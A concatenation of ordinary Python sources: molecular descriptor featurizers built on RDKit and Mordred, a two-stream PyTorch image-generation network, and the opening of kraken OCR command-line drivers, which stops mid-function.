self.impute_values = np.array(ms)
def transform(self, X):
for j in range(X.shape[1]):
mask = np.isnan(X[:, j])
X[mask, j] = self.impute_values[j]
return X
def save(self, file_name):
joblib.dump(self, file_name)
def load(self, file_name):
return joblib.load(file_name)
class VarianceFilter(object):
def __init__(self):
self._name = "variance_filter"
def fit(self, X):
self.sel = VarianceThreshold()
self.sel.fit(X)
self.col_idxs = self.sel.transform([[i for i in range(X.shape[1])]]).ravel()
def transform(self, X):
return self.sel.transform(X)
def save(self, file_name):
joblib.dump(self, file_name)
def load(self, file_name):
return joblib.load(file_name)
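# Sketch of how the four preprocessing steps above are chained; this mirrors
# the fit order used by the descriptor classes below (the toy matrix is
# illustrative only):
# X = np.array([[1.0, np.nan, 7.0], [2.0, np.nan, 7.0]], dtype=np.float32)
# nan_filter = NanFilter(); nan_filter.fit(X); X = nan_filter.transform(X)
# imputer = Imputer(); imputer.fit(X); X = imputer.transform(X)
# variance_filter = VarianceFilter(); variance_filter.fit(X); X = variance_filter.transform(X)
# scaler = Scaler(); scaler.fit(X); X = scaler.transform(X)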
# MORDRED DESCRIPTORS
def mordred_featurizer(smiles):
calc = Calculator(descriptors, ignore_3D=True)
df = calc.pandas([Chem.MolFromSmiles(smi) for smi in smiles])
return df
class MordredDescriptor(object):
def __init__(self):
self.nan_filter = NanFilter()
self.imputer = Imputer()
self.variance_filter = VarianceFilter()
self.scaler = Scaler()
def fit(self, smiles):
df = mordred_featurizer(smiles)
X = np.array(df, dtype=np.float32)
self.nan_filter.fit(X)
X = self.nan_filter.transform(X)
self.imputer.fit(X)
X = self.imputer.transform(X)
self.variance_filter.fit(X)
X = self.variance_filter.transform(X)
self.scaler.fit(X)
X = self.scaler.transform(X)
self.features = list(df.columns)
self.features = [self.features[i] for i in self.nan_filter.col_idxs]
self.features = [self.features[i] for i in self.variance_filter.col_idxs]
return pd.DataFrame(X, columns=self.features)
def transform(self, smiles):
df = mordred_featurizer(smiles)
X = np.array(df, dtype=np.float32)
X = self.nan_filter.transform(X)
X = self.imputer.transform(X)
X = self.variance_filter.transform(X)
X = self.scaler.transform(X)
return pd.DataFrame(X, columns=self.features)
# CLASSIC DESCRIPTORS
@dataclass
class Descriptors:
"""Molecular descriptors"""
#: Descriptor type
descriptor_type: str
#: Descriptor values
descriptors: tuple
    #: Descriptor names
    descriptor_names: tuple
    #: t-stats for each molecule
    tstats: tuple = ()
def _calculate_rdkit_descriptors(mol):
from rdkit.ML.Descriptors import MoleculeDescriptors # type: ignore
dlist = [
"NumHDonors",
"NumHAcceptors",
"MolLogP",
"NumHeteroatoms",
"RingCount",
"NumRotatableBonds",
]
c = MoleculeDescriptors.MolecularDescriptorCalculator(dlist)
d = c.CalcDescriptors(mol)
def calc_aromatic_bonds(mol):
return sum(1 for b in mol.GetBonds() if b.GetIsAromatic())
def _create_smarts(SMARTS):
s = ",".join("$(" + s + ")" for s in SMARTS)
_mol = MolFromSmarts("[" + s + "]")
return _mol
def calc_acid_groups(mol):
acid_smarts = (
"[O;H1]-[C,S,P]=O",
"[*;-;!$(*~[*;+])]",
"[NH](S(=O)=O)C(F)(F)F",
"n1nnnc1",
)
pat = _create_smarts(acid_smarts)
return len(mol.GetSubstructMatches(pat))
def calc_basic_groups(mol):
basic_smarts = (
"[NH2]-[CX4]",
"[NH](-[CX4])-[CX4]",
"N(-[CX4])(-[CX4])-[CX4]",
"[*;+;!$(*~[*;-])]",
"N=C-N",
"N-C=N",
)
pat = _create_smarts(basic_smarts)
return len(mol.GetSubstructMatches(pat))
def calc_apol(mol, includeImplicitHs=True):
# atomic polarizabilities available here:
# https://github.com/mordred-descriptor/mordred/blob/develop/mordred/data/polarizalibity78.txt
ap = os.path.join(DATA_PATH, "atom_pols.txt")
with open(ap, "r") as f:
atom_pols = [float(x) for x in next(f).split(",")]
res = 0.0
for atom in mol.GetAtoms():
anum = atom.GetAtomicNum()
            if anum < len(atom_pols):
apol = atom_pols[anum]
if includeImplicitHs:
apol += atom_pols[1] * atom.GetTotalNumHs(includeNeighbors=False)
res += apol
else:
raise ValueError(f"atomic number {anum} not found")
return res
d = d + (
calc_aromatic_bonds(mol),
calc_acid_groups(mol),
calc_basic_groups(mol),
calc_apol(mol),
)
return d
def classic_featurizer(smiles):
names = tuple(
[
"number of hydrogen bond donor",
"number of hydrogen bond acceptor",
"Wildman-Crippen LogP",
"number of heteroatoms",
"ring count",
"number of rotatable bonds",
"aromatic bonds count",
"acidic group count",
"basic group count",
"atomic polarizability",
]
)
mols = [Chem.MolFromSmiles(smi) for smi in smiles]
R = []
cols = None
for m in mols:
descriptors = _calculate_rdkit_descriptors(m)
descriptor_names = names
descriptors = Descriptors(
descriptor_type="Classic",
descriptors=descriptors,
descriptor_names=descriptor_names,
)
R += [list(descriptors.descriptors)]
if cols is None:
cols = list(descriptors.descriptor_names)
data = pd.DataFrame(R, columns=cols)
return data
class ClassicDescriptor(object):
def __init__(self):
self.nan_filter = NanFilter()
self.imputer = Imputer()
self.variance_filter = VarianceFilter()
self.scaler = Scaler()
def fit(self, smiles):
df = classic_featurizer(smiles)
X = np.array(df, dtype=np.float32)
self.nan_filter.fit(X)
X = self.nan_filter.transform(X)
self.imputer.fit(X)
X = self.imputer.transform(X)
self.variance_filter.fit(X)
X = self.variance_filter.transform(X)
self.scaler.fit(X)
X = self.scaler.transform(X)
self.features = list(df.columns)
self.features = [self.features[i] for i in self.nan_filter.col_idxs]
self.features = [self.features[i] for i in self.variance_filter.col_idxs]
return pd.DataFrame(X, columns=self.features)
def transform(self, smiles):
df = classic_featurizer(smiles)
X = np.array(df, dtype=np.float32)
X = self.nan_filter.transform(X)
X = self.imputer.transform(X)
X = self.variance_filter.transform(X)
X = self.scaler.transform(X)
return pd.DataFrame(X, columns=self.features)
# MORGAN FINGERPRINTS
from rdkit.Chem import rdMolDescriptors as rd
from rdkit import Chem
RADIUS = 3
NBITS = 2048
DTYPE = np.uint8
def clip_sparse(vect, nbits):
l = [0]*nbits
for i,v in vect.GetNonzeroElements().items():
l[i] = v if v < 255 else 255
return l
class _MorganDescriptor(object):
def __init__(self):
self.nbits = NBITS
self.radius = RADIUS
def calc(self, mol):
v = rd.GetHashedMorganFingerprint(mol, radius=self.radius, nBits=self.nbits)
return clip_sparse(v, self.nbits)
def morgan_featurizer(smiles):
    d = _MorganDescriptor()
    X = np.zeros((len(smiles), NBITS), dtype=DTYPE)
    for i, smi in enumerate(smiles):
        mol = Chem.MolFromSmiles(smi)
        if mol is None:
            continue  # leave an all-zero row for unparseable SMILES
        X[i, :] = d.calc(mol)
    return X
class MorganDescriptor(object):
def __init__(self):
pass
def fit(self, smiles):
X = morgan_featurizer(smiles)
self.features = ["fp-{0}".format(i) for i in range(X.shape[1])]
return pd.DataFrame(X, columns=self.features)
def transform(self, smiles):
X = morgan_featurizer(smiles)
return pd.DataFrame(X, columns=self.features)
# RDKIT 200 Descriptors
from rdkit.Chem import Descriptors as RdkitDescriptors
from rdkit import Chem
RDKIT_PROPS = {"1.0.0": ['BalabanJ', 'BertzCT', 'Chi0', 'Chi0n', 'Chi0v', 'Chi1', 'Chi1n',
'Chi1v', 'Chi2n', 'Chi2v', 'Chi3n', 'Chi3v', 'Chi4n', 'Chi4v',
'EState_VSA1', 'EState_VSA10', 'EState_VSA11', 'EState_VSA2',
'EState_VSA3', 'EState_VSA4', 'EState_VSA5', 'EState_VSA6',
'EState_VSA7', 'EState_VSA8', 'EState_VSA9', 'ExactMolWt',
'FpDensityMorgan1', 'FpDensityMorgan2', 'FpDensityMorgan3',
'FractionCSP3', 'HallKierAlpha', 'HeavyAtomCount', 'HeavyAtomMolWt',
'Ipc', 'Kappa1', 'Kappa2', 'Kappa3', 'LabuteASA', 'MaxAbsEStateIndex',
'MaxAbsPartialCharge', 'MaxEStateIndex', 'MaxPartialCharge',
'MinAbsEStateIndex', 'MinAbsPartialCharge', 'MinEStateIndex',
'MinPartialCharge', 'MolLogP', 'MolMR', 'MolWt', 'NHOHCount',
'NOCount', 'NumAliphaticCarbocycles', 'NumAliphaticHeterocycles',
'NumAliphaticRings', 'NumAromaticCarbocycles', 'NumAromaticHeterocycles',
'NumAromaticRings', 'NumHAcceptors', 'NumHDonors', 'NumHeteroatoms',
'NumRadicalElectrons', 'NumRotatableBonds', 'NumSaturatedCarbocycles',
'NumSaturatedHeterocycles', 'NumSaturatedRings', 'NumValenceElectrons',
'PEOE_VSA1', 'PEOE_VSA10', 'PEOE_VSA11', 'PEOE_VSA12', 'PEOE_VSA13',
'PEOE_VSA14', 'PEOE_VSA2', 'PEOE_VSA3', 'PEOE_VSA4', 'PEOE_VSA5',
'PEOE_VSA6', 'PEOE_VSA7', 'PEOE_VSA8', 'PEOE_VSA9', 'RingCount',
'SMR_VSA1', 'SMR_VSA10', 'SMR_VSA2', 'SMR_VSA3', 'SMR_VSA4', 'SMR_VSA5',
'SMR_VSA6', 'SMR_VSA7', 'SMR_VSA8', 'SMR_VSA9', 'SlogP_VSA1', 'SlogP_VSA10',
'SlogP_VSA11', 'SlogP_VSA12', 'SlogP_VSA2', 'SlogP_VSA3', 'SlogP_VSA4',
'SlogP_VSA5', 'SlogP_VSA6', 'SlogP_VSA7', 'SlogP_VSA8', 'SlogP_VSA9',
'TPSA', 'VSA_EState1', 'VSA_EState10', 'VSA_EState2', 'VSA_EState3',
'VSA_EState4', 'VSA_EState5', 'VSA_EState6', 'VSA_EState7', 'VSA_EState8',
'VSA_EState9', 'fr_Al_COO', 'fr_Al_OH', 'fr_Al_OH_noTert', 'fr_ArN',
'fr_Ar_COO', 'fr_Ar_N', 'fr_Ar_NH', 'fr_Ar_OH', 'fr_COO', 'fr_COO2',
'fr_C_O', 'fr_C_O_noCOO', 'fr_C_S', 'fr_HOCCN', 'fr_Imine', 'fr_NH0',
'fr_NH1', 'fr_NH2', 'fr_N_O', 'fr_Ndealkylation1', 'fr_Ndealkylation2',
'fr_Nhpyrrole', 'fr_SH', 'fr_aldehyde', 'fr_alkyl_carbamate', 'fr_alkyl_halide',
'fr_allylic_oxid', 'fr_amide', 'fr_amidine', 'fr_aniline', 'fr_aryl_methyl',
'fr_azide', 'fr_azo', 'fr_barbitur', 'fr_benzene', 'fr_benzodiazepine',
'fr_bicyclic', 'fr_diazo', 'fr_dihydropyridine', 'fr_epoxide', 'fr_ester',
'fr_ether', 'fr_furan', 'fr_guanido', 'fr_halogen', 'fr_hdrzine', 'fr_hdrzone',
'fr_imidazole', 'fr_imide', 'fr_isocyan', 'fr_isothiocyan', 'fr_ketone',
'fr_ketone_Topliss', 'fr_lactam', 'fr_lactone', 'fr_methoxy', 'fr_morpholine',
'fr_nitrile', 'fr_nitro', 'fr_nitro_arom', 'fr_nitro_arom_nonortho',
'fr_nitroso', 'fr_oxazole', 'fr_oxime', 'fr_para_hydroxylation', 'fr_phenol',
'fr_phenol_noOrthoHbond', 'fr_phos_acid', 'fr_phos_ester', 'fr_piperdine',
'fr_piperzine', 'fr_priamide', 'fr_prisulfonamd', 'fr_pyridine', 'fr_quatN',
'fr_sulfide', 'fr_sulfonamd', 'fr_sulfone', 'fr_term_acetylene', 'fr_tetrazole',
'fr_thiazole', 'fr_thiocyan', 'fr_thiophene', 'fr_unbrch_alkane', 'fr_urea', 'qed']
}
CURRENT_VERSION = "1.0.0"
class _RdkitDescriptor(object):
def __init__(self):
self.properties = RDKIT_PROPS[CURRENT_VERSION]
self._funcs = {name: func for name, func in RdkitDescriptors.descList}
def calc(self, mols):
R = []
for mol in mols:
if mol is None:
r = [np.nan]*len(self.properties)
else:
r = []
for prop in self.properties:
r += [self._funcs[prop](mol)]
R += [r]
return np.array(R)
def rdkit_featurizer(smiles):
d = _RdkitDescriptor()
mols = [Chem.MolFromSmiles(smi) for smi in smiles]
X = d.calc(mols)
data = pd.DataFrame(X, columns=d.properties)
return data
class RdkitDescriptor(object):
def __init__(self):
self.nan_filter = NanFilter()
self.imputer = Imputer()
self.variance_filter = VarianceFilter()
self.scaler = Scaler()
def fit(self, smiles):
df = rdkit_featurizer(smiles)
X = np.array(df, dtype=np.float32)
self.nan_filter.fit(X)
X = self.nan_filter.transform(X)
self.imputer.fit(X)
X = self.imputer.transform(X)
self.variance_filter.fit(X)
X = self.variance_filter.transform(X)
self.scaler.fit(X)
X = self.scaler.transform(X)
self.features = list(df.columns)
self.features = [self.features[i] for i in self.nan_filter.col_idxs]
self.features = [self.features[i] for i in self.variance_filter.col_idxs]
return pd.DataFrame(X, columns=self.features)
def transform(self, smiles):
df = rdkit_featurizer(smiles)
X = np.array(df, dtype=np.float32)
X = self.nan_filter.transform(X)
X = self.imputer.transform(X)
X = self.variance_filter.transform(X)
X = self.scaler.transform(X)
return pd.DataFrame(X, columns=self.features)
# MACCS DESCRIPTORS
def maccs_featurizer(smiles):
mols = [Chem.MolFromSmiles(smi) for smi in smiles]
mk = os.path.join(DATA_PATH, "MACCSkeys.txt")
with open(str(mk), "r") as f:
names = tuple([x.strip().split("\t")[-1] for x in f.readlines()[1:]])
R = []
cols = None
for m in mols:
# rdkit sets fps[0] to 0 and starts keys at 1!
fps = list(MACCSkeys.GenMACCSKeys(m).ToBitString())[1:] # ersilia edit
descriptors = tuple(int(i) for i in fps)
descriptor_names = names
descriptors = Descriptors(
descriptor_type="MACCS",
descriptors=descriptors,
descriptor_names=descriptor_names,
)
R += [list(descriptors.descriptors)]
if cols is None:
cols = list(descriptors.descriptor_names)
data = pd.DataFrame(R, columns=cols)
return data
class MaccsDescriptor(object):
def __init__(self):
pass
def fit(self, smiles):
return maccs_featurizer(smiles)
def transform(self, smiles):
return maccs_featurizer(smiles)
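# Usage sketch shared by the descriptor classes above (the SMILES strings are
# illustrative): fit() learns the column set and scaling on a training list,
# transform() reuses them on new molecules.
# smiles_train = ["CCO", "c1ccccc1", "CC(=O)O"]
# descriptor = MorganDescriptor()
# X_train = descriptor.fit(smiles_train)    # pandas DataFrame
# X_new = descriptor.transform(["CCN"])     # same columns as X_train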
|
nilq/baby-python
|
python
|
import torch.nn as nn
import functools
import torch
import torch.nn.functional as F
from torch.autograd import Variable
import math
import torchvision
class Bottleneck(nn.Module):
# expansion = 4
def __init__(self, inplanes, outplanes, stride=1, downsample=None):
super(Bottleneck, self).__init__()
self.conv1 = nn.Conv2d(inplanes, int(inplanes/4), kernel_size=1, bias=False)
self.bn1 = nn.InstanceNorm2d(int(inplanes/4))
self.conv2 = nn.Conv2d(int(inplanes/4), int(inplanes/4), kernel_size=3, stride=stride,
padding=1, bias=False)
self.bn2 = nn.InstanceNorm2d(int(inplanes/4))
self.conv3 = nn.Conv2d(int(inplanes/4), outplanes, kernel_size=1, bias=False)
self.bn3 = nn.InstanceNorm2d(outplanes)
self.relu = nn.LeakyReLU(inplace=True)
def forward(self, x):
residual = x
out = self.conv1(x)
out = self.bn1(out)
out = self.relu(out)
out = self.conv2(out)
out = self.bn2(out)
out = self.relu(out)
out = self.conv3(out)
out = self.bn3(out)
out += residual
out = self.relu(out)
return out
class ASBlock(nn.Module):
def __init__(self, dim, padding_type, norm_layer, use_dropout, use_bias, cated_stream2=False):
super(ASBlock, self).__init__()
self.conv_block_stream1 = self.build_conv_block(dim, padding_type, norm_layer, use_dropout, use_bias, cal_att=False)
self.conv_block_stream2 = self.build_conv_block(dim, padding_type, norm_layer, use_dropout, use_bias, cal_att=True, cated_stream2=cated_stream2)
self.channel_switch = nn.Conv2d(dim * 2, dim, kernel_size=1, padding=0, bias=False)
self.channel_switch_N = nn.InstanceNorm2d(dim)
        self.channel_switch_A = nn.LeakyReLU(inplace=True)
def build_conv_block(self, dim, padding_type, norm_layer, use_dropout, use_bias, cated_stream2=False, cal_att=False):
conv_block = []
p = 0
if padding_type == 'reflect':
conv_block += [nn.ReflectionPad2d(1)]
elif padding_type == 'replicate':
conv_block += [nn.ReplicationPad2d(1)]
elif padding_type == 'zero':
p = 1
else:
raise NotImplementedError('padding [%s] is not implemented' % padding_type)
if cated_stream2:
conv_block += [nn.Conv2d(dim*2, dim*2, kernel_size=3, padding=p, bias=use_bias),
norm_layer(dim*2),
nn.ReLU(True)]
else:
conv_block += [nn.Conv2d(dim, dim, kernel_size=3, padding=p, bias=use_bias),
norm_layer(dim),
nn.ReLU(True)]
p = 0
if padding_type == 'reflect':
conv_block += [nn.ReflectionPad2d(1)]
elif padding_type == 'replicate':
conv_block += [nn.ReplicationPad2d(1)]
elif padding_type == 'zero':
p = 1
else:
raise NotImplementedError('padding [%s] is not implemented' % padding_type)
if cal_att:
if cated_stream2:
conv_block += [nn.Conv2d(dim*2, dim, kernel_size=3, padding=p, bias=use_bias)]
else:
conv_block += [nn.Conv2d(dim, dim, kernel_size=3, padding=p, bias=use_bias)]
else:
conv_block += [nn.Conv2d(dim, dim, kernel_size=3, padding=p, bias=use_bias),
norm_layer(dim)]
return nn.Sequential(*conv_block)
def forward(self, x1, x2):
x1_out = self.conv_block_stream1(x1)
x2_out = self.conv_block_stream2(x2)
        att = torch.sigmoid(x2_out)
x1_out = torch.cat([x1_out ,att],1)
x1_out = self.channel_switch(x1_out)
x1_out = self.channel_switch_N(x1_out)
x1_out_after = self.channel_switch_A(x1_out)
out = x1 + x1_out_after # residual connection
# stream2 receive feedback from stream1
x2_out = torch.cat((x2_out, out), 1)
return out, x2_out, x1, x1_out_after
class ASNModel(nn.Module):
def __init__(self, input_nc, output_nc, ngf=64, norm_layer=nn.InstanceNorm2d, use_dropout=False, n_blocks=6, gpu_ids=[], padding_type='reflect', n_downsampling=2):
assert(n_blocks >= 0 and type(input_nc) == list)
super(ASNModel, self).__init__()
self.input_nc_s1 = input_nc[0]
self.input_nc_s2 = input_nc[1]
self.output_nc = output_nc
self.ngf = ngf
self.gpu_ids = gpu_ids
self.model_stream1_down_Reflect = nn.ReflectionPad2d(3)
self.model_stream1_down_Con1 = nn.Conv2d(self.input_nc_s1, 64, kernel_size=7, padding=0, bias=False)
self.model_stream1_down_N1 = nn.InstanceNorm2d(64)
        self.model_stream1_down_A1 = nn.LeakyReLU(inplace=True)
self.model_stream2_down_Reflect = nn.ReflectionPad2d(3)
self.model_stream2_down_Con1 = nn.Conv2d(self.input_nc_s2, 64, kernel_size=7, padding=0,
bias=False)
self.model_stream2_down_N1 = nn.InstanceNorm2d(64)
        self.model_stream2_down_A1 = nn.LeakyReLU(inplace=True)
self.model_stream1_down_Con2 = nn.Conv2d(64 ,128, kernel_size=3,
stride=2, padding=1, bias=False)
self.model_stream1_down_N2 = nn.InstanceNorm2d(128)
        self.model_stream1_down_A2 = nn.LeakyReLU(inplace=True)
self.model_stream2_down_Con2 = nn.Conv2d(64 , 128, kernel_size=3,
stride=2, padding=1, bias=False)
self.model_stream2_down_N2 = nn.InstanceNorm2d(128)
        self.model_stream2_down_A2 = nn.LeakyReLU(inplace=True)
self.model_stream1_down_Con3 = nn.Conv2d(128, 256, kernel_size=3,
stride=2, padding=1, bias=False)
self.model_stream1_down_N3 = nn.InstanceNorm2d(256)
        self.model_stream1_down_A3 = nn.LeakyReLU(inplace=True)
self.model_stream2_down_Con3 = nn.Conv2d(128, 256, kernel_size=3,
stride=2, padding=1, bias=False)
self.model_stream2_down_N3 = nn.InstanceNorm2d(256)
        self.model_stream2_down_A3 = nn.LeakyReLU(inplace=True)
self.model_stream1_down_Con4 = nn.Conv2d(256, 512, kernel_size=3, stride=2, padding=1, bias=False)
self.model_stream1_down_N4 = nn.InstanceNorm2d(512)
        self.model_stream1_down_A4 = nn.LeakyReLU(inplace=True)
self.model_stream2_down_Con4 = nn.Conv2d(256, 512, kernel_size=3, stride=2, padding=1, bias=False)
self.model_stream2_down_N4 = nn.InstanceNorm2d(512)
        self.model_stream2_down_A4 = nn.LeakyReLU(inplace=True)
cated_stream2 = [True for i in range(4)]
cated_stream2[0] = False
asBlock = nn.ModuleList()
for i in range(4):
asBlock.append(ASBlock(512, padding_type=padding_type, norm_layer=norm_layer, use_dropout=use_dropout, use_bias=False, cated_stream2=cated_stream2[i]))
self.layer0 = self._make_layer(2, 1024, 1024)
self.model_stream1_up_Con0_rgb = nn.ConvTranspose2d(1024, 3, kernel_size=3, stride=1, padding=1, bias=False)
self.model_stream1_up_A0_rgb = nn.Tanh()
self.model_stream1_up_Con0 = nn.ConvTranspose2d(1024, 512, kernel_size=3, stride=2, padding=1, output_padding=1, bias=False)
self.model_stream1_up_N0 = nn.InstanceNorm2d(512)
self.model_stream1_up_A0 = nn.ReLU(True)
self.layer1 = self._make_layer(2, 771, 771)
self.model_stream1_up_Con1_rgb = nn.ConvTranspose2d(771, 3, kernel_size=3, stride=1, padding=1, bias=False)
self.model_stream1_up_A1_rgb = nn.Tanh()
self.model_stream1_up_Con1 = nn.ConvTranspose2d(771, 256, kernel_size=3, stride=2, padding=1, output_padding=1, bias=False)
self.model_stream1_up_N1 = nn.InstanceNorm2d(256)
self.model_stream1_up_A1 = nn.ReLU(True)
self.layer2 = self._make_layer(2, 387, 387)
self.model_stream1_up_Con2_rgb = nn.ConvTranspose2d(387, 3, kernel_size=3, stride=1, padding=1, bias=False)
        self.model_stream1_up_A2_rgb = nn.Tanh()
self.model_stream1_up_Con2 = nn.ConvTranspose2d(387 , 128, kernel_size=3, stride=2, padding=1, output_padding=1, bias=False)
self.model_stream1_up_N2 = nn.InstanceNorm2d(128)
self.model_stream1_up_A2 = nn.ReLU(True)
self.model_stream1_up_Reflect = nn.ReflectionPad2d(1)
self.model_stream1_up_Con3 = nn.Conv2d(128 , 3, kernel_size=3, padding=0, bias=False)
self.model_stream1_up_A3 = nn.Tanh()
self.model_stream1_up_Con5 = nn.Conv2d(6 , 3, kernel_size=1, padding=0, bias=False)
self.model_stream1_up_A5 = nn.Tanh()
self.asBlock = asBlock
def _make_layer(self, block, planes, outplanes):
layers = []
layers.append(Bottleneck(planes, outplanes))
for i in range(1, block):
layers.append(Bottleneck(outplanes, outplanes))
return nn.Sequential(*layers)
def weights_init_kaiming(self, m):
classname = m.__class__.__name__
        if classname.find('Linear') != -1:
            nn.init.kaiming_normal_(m.weight, a=0, mode='fan_out')
            if m.bias is not None:
                nn.init.constant_(m.bias, 0.0)
elif classname.find('Conv') != -1:
nn.init.kaiming_normal_(m.weight, a=0, mode='fan_in')
if m.bias is not None:
nn.init.constant_(m.bias, 0.0)
elif classname.find('BatchNorm') != -1:
if m.affine:
nn.init.constant_(m.weight, 1.0)
nn.init.constant_(m.bias, 0.0)
def weights_init_classifier(self, m):
classname = m.__class__.__name__
if classname.find('Linear') != -1:
nn.init.normal_(m.weight, std=0.001)
            if m.bias is not None:
                nn.init.constant_(m.bias, 0.0)
def forward(self, input):
x1, x2 = input
# eye, nose, mouth are for TP-GAN
# Down Sampling
x1 = self.model_stream1_down_Reflect(x1)
x1 = self.model_stream1_down_Con1(x1)
x1 = self.model_stream1_down_N1(x1)
x1 = self.model_stream1_down_A1(x1)
x2 = self.model_stream2_down_Reflect(x2)
x2 = self.model_stream2_down_Con1(x2)
x2 = self.model_stream2_down_N1(x2)
x2 = self.model_stream2_down_A1(x2)
x1 = self.model_stream1_down_Con2(x1)
x1 = self.model_stream1_down_N2(x1)
x1 = self.model_stream1_down_A2(x1)
x2 = self.model_stream2_down_Con2(x2)
x2 = self.model_stream2_down_N2(x2)
x2 = self.model_stream2_down_A2(x2)
x_64 = x1
x1 = self.model_stream1_down_Con3(x1)
x1 = self.model_stream1_down_N3(x1)
x1 = self.model_stream1_down_A3(x1)
x2 = self.model_stream2_down_Con3(x2)
x2 = self.model_stream2_down_N3(x2)
x2 = self.model_stream2_down_A3(x2)
x_32 = x1
x1 = self.model_stream1_down_Con4(x1)
x1 = self.model_stream1_down_N4(x1)
x1 = self.model_stream1_down_A4(x1)
x_16 = x1
x2 = self.model_stream2_down_Con4(x2)
x2 = self.model_stream2_down_N4(x2)
x2 = self.model_stream2_down_A4(x2)
# AS-Block
att = torch.sigmoid(x2)
x1_out = x1 * att
x1 = x1 + x1_out
before_list = []
after_list =[]
for model in self.asBlock:
x1, x2, x1_before, x1_after = model(x1, x2)
before_list.append(x1_before)
after_list.append(x1_after)
x1 = torch.cat([x1 ,x_16],1)
x1 = self.layer0(x1)
fake_16 = self.model_stream1_up_Con0_rgb(x1)
fake_16 = self.model_stream1_up_A0_rgb(fake_16)
        fake_16_32 = F.interpolate(fake_16, (32, 32), mode='bilinear', align_corners=False)
x1 = self.model_stream1_up_Con0(x1)
x1 = self.model_stream1_up_N0(x1)
x1 = self.model_stream1_up_A0(x1)
x1 = torch.cat([x1 ,x_32],1)
x1 = torch.cat([x1 ,fake_16_32],1)
x1 = self.layer1(x1)
fake_32 = self.model_stream1_up_Con1_rgb(x1)
        fake_32 = self.model_stream1_up_A1_rgb(fake_32)
        fake_32_64 = F.interpolate(fake_32, (64, 64), mode='bilinear', align_corners=False)
x1 = self.model_stream1_up_Con1(x1)
x1 = self.model_stream1_up_N1(x1)
x1 = self.model_stream1_up_A1(x1)
x1 = torch.cat([x1 ,x_64],1)
x1 = torch.cat([x1 ,fake_32_64],1)
x1 = self.layer2(x1)
fake_64 = self.model_stream1_up_Con2_rgb(x1)
        fake_64 = self.model_stream1_up_A2_rgb(fake_64)
        fake_64_128 = F.interpolate(fake_64, (128, 128), mode='bilinear', align_corners=False)
x1 = self.model_stream1_up_Con2(x1)
x1 = self.model_stream1_up_N2(x1)
x1 = self.model_stream1_up_A2(x1)
x1 = self.model_stream1_up_Reflect(x1)
x1 = self.model_stream1_up_Con3(x1)
x1 = self.model_stream1_up_A3(x1)
x1 = torch.cat([x1 ,fake_64_128],1)
x1 = self.model_stream1_up_Con5(x1)
x1 = self.model_stream1_up_A5(x1)
return x1, fake_64, fake_32, fake_16, before_list, after_list
class ASNetwork(nn.Module):
def __init__(self, input_nc, output_nc, ngf=64, norm_layer=nn.BatchNorm2d, use_dropout=False, n_blocks=6, gpu_ids=[], padding_type='reflect', n_downsampling=2):
super(ASNetwork, self).__init__()
        assert type(input_nc) == list and len(input_nc) == 2, 'AttModule takes input_nc as a two-element list only!'
self.gpu_ids = gpu_ids
self.model = ASNModel(input_nc, output_nc, ngf, norm_layer, use_dropout, n_blocks, gpu_ids, padding_type, n_downsampling=n_downsampling)
def forward(self, input):
if self.gpu_ids and isinstance(input[0].data, torch.cuda.FloatTensor):
return nn.parallel.data_parallel(self.model, input, self.gpu_ids)
else:
return self.model(input)
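# Smoke-test sketch for the two-stream generator above. The channel counts and
# the 128x128 spatial size are illustrative assumptions; input_nc must be a
# two-element list, one entry per stream.
# net = ASNetwork(input_nc=[3, 18], output_nc=3)
# x1 = torch.randn(1, 3, 128, 128)    # appearance stream
# x2 = torch.randn(1, 18, 128, 128)   # pose/condition stream
# out, fake_64, fake_32, fake_16, before_list, after_list = net([x1, x2])
# out.shape                           # torch.Size([1, 3, 128, 128])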
|
nilq/baby-python
|
python
|
# -*- coding: utf-8 -*-
#
# Copyright 2015 Benjamin Kiessling
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express
# or implied. See the License for the specific language governing
# permissions and limitations under the License.
"""
kraken.kraken
~~~~~~~~~~~~~
Command line drivers for recognition functionality.
"""
import os
import warnings
import logging
from typing import Dict, Union, List, cast, Any, IO
from functools import partial
from PIL import Image
import click
from click import open_file
from kraken.lib import log
warnings.simplefilter('ignore', UserWarning)
logger = logging.getLogger('kraken')
APP_NAME = 'kraken'
DEFAULT_MODEL = ['en-default.mlmodel']
LEGACY_MODEL_DIR = '/usr/local/share/ocropus'
def message(msg: str, **styles) -> None:
if logger.getEffectiveLevel() >= 30:
click.secho(msg, **styles)
def binarizer(threshold, zoom, escale, border, perc, range, low, high, base_image, input, output) -> None:
from kraken import binarization
try:
im = Image.open(input)
except IOError as e:
raise click.BadParameter(str(e))
message('Binarizing\t', nl=False)
try:
res = binarization.nlbin(im, threshold, zoom, escale, border, perc, range,
low, high)
form = None
ext = os.path.splitext(output)[1]
if ext in ['.jpg', '.jpeg', '.JPG', '.JPEG', '']:
form = 'png'
if ext:
logger.warning('jpeg does not support 1bpp images. Forcing to png.')
res.save(output, format=form)
except Exception:
message('\u2717', fg='red')
raise
message('\u2713', fg='green')
def segmenter(text_direction, script_detect, allowed_scripts, scale,
maxcolseps, black_colseps, remove_hlines, pad, mask, base_image, input,
output) -> None:
import json
from kraken import pageseg
try:
im = Image.open(input)
except IOError as e:
raise click.BadParameter(str(e))
if mask:
try:
mask = Image.open(mask)
except IOError as e:
raise click.BadParameter(str(e))
message('Segmenting\t', nl=False)
try:
res = pageseg.segment(im, text_direction, scale, maxcolseps, black_colseps, no_hlines=remove_hlines, pad=pad, mask=mask)
if script_detect:
res = pageseg.detect_scripts(im, res, valid_scripts=allowed_scripts)
except Exception:
message('\u2717', fg='red')
raise
with open_file(output, 'w') as fp:
fp = cast(IO[Any], fp)
json.dump(res, fp)
message('\u2713', fg='green')
def recognizer(model, pad, no_segmentation, bidi_reordering, script_ignore, base_image, input, output, lines) -> None:
import json
import tempfile
from kraken import rpred
try:
im = Image.open(base_image)
except IOError as e:
raise click.BadParameter(str(e))
ctx = click.get_current_context()
# input may either be output from the segmenter then it is a JSON file or
# be an image file when running the OCR subcommand alone. might still come
# from some other subcommand though.
scripts = set()
if not lines and base_image != input:
lines = input
    is_temp_segmentation = False
    if not lines:
        if no_segmentation:
            lines = tempfile.NamedTemporaryFile(mode='w', delete=False)
            logger.info('Running in no_segmentation mode. Creating temporary segmentation {}.'.format(lines.name))
            json.dump({'script_detection': False,
